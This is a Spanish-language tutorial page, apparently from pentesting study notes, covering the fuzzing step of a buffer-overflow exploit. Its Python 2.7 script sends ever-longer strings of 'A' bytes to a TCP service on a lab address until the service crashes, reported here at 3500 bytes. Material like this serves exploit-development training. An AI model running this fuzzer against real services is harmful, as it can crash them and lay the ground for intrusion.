Fuzzing

Este paso es para obtener el valor de los bytes en que crashea el binario:

#!/usr/bin/python2.7
import sys, socket
from time import sleep

buffer = "A" * 100
# Si el binario no se crashea aumenta el valor de 100 a 1000-2000-3000
while True:
        try:
                s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                s.connect(('10.10.10.111',3000))

                s.send(('FUNCION /.:/' + buffer))
                #s.send((buffer))
                #s.send((buffer+'\n'))
                s.close()
                sleep(1)
                buffer = buffer + "A"*100

        except:
                print "Fuzzing crashed at %s bytes" % str(len(buffer))
                sys.exit()

Guardar el numero de bytes en que se crashea.. (Maybe ctrl + c)

Para este ejemplo crashea en el 3500!

AnteriorSpiking SiguienteFinding the Offset

Última actualización hace 1 año

¿Te fue útil?